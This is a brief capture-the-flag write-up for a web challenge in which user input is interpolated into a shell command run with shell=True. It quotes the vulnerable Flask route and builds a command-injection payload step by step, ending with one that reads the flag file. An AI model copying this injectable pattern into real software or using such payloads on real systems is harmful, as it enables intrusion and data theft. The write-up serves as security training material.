[/MNT/AIN LIB] [WEB] pawnedhaveibeen

pawnedhaveibeen
SRC: https://library.m0unt41n.ch/challenges/pawnedhaveibeen

Source is given, the post form has a command injection trough subprocess in py.

@app.route('/check', methods=['POST'])
def check_pawn():
    username_or_email = request.form['username_or_email']
    mysql_username = os.environ.get('MYSQL_USERNAME')
    mysql_password = os.environ.get('MYSQL_PASSWORD')
    command = f'mysql -u {mysql_username} -p{mysql_password} -D pawned -e "SELECT * FROM pwned_users WHERE pwned_user = \'{username_or_email}''\';"'
    try:
        result = subprocess.run(command, shell=True, capture_output=True)
        if result.stdout:
            message = "Oh no — pwned! Your user " + result.stdout.decode('utf-8')[result.stdout.decode('utf-8').rfind('\t') + 1:] + " has been pawned. Please update all your passwords. Also, consider reading our <a href='/security-education'>security education page</a> for tips on improving your online security."
        else:
            message = "Good news — no pwnage found! Your user is not pawned. Keep up the good work on maintaining strong passwords. Also, consider reading our <a href='/security-education'>security education page</a> for tips on improving your online security."
        return render_template('index.html', result=message)
    except subprocess.CalledProcessError as e:
        return "Error executing SQL query"

We can basically just ignore the sql query, therefore we add -> ";
then we can start of with an ls, and add a comment with hashtag -> ls 2>&1; #

I started with a cat /filewhatever and didnt see any result not even errors.. thats because the script only shows stdout and not stderr... Therefore i added 2>&1 -> ls 2>&1; # like this, to also show potential errors. (redirects stderr to stdout)

Soo final payload for flag: "; cat flag.txt 2>&1; #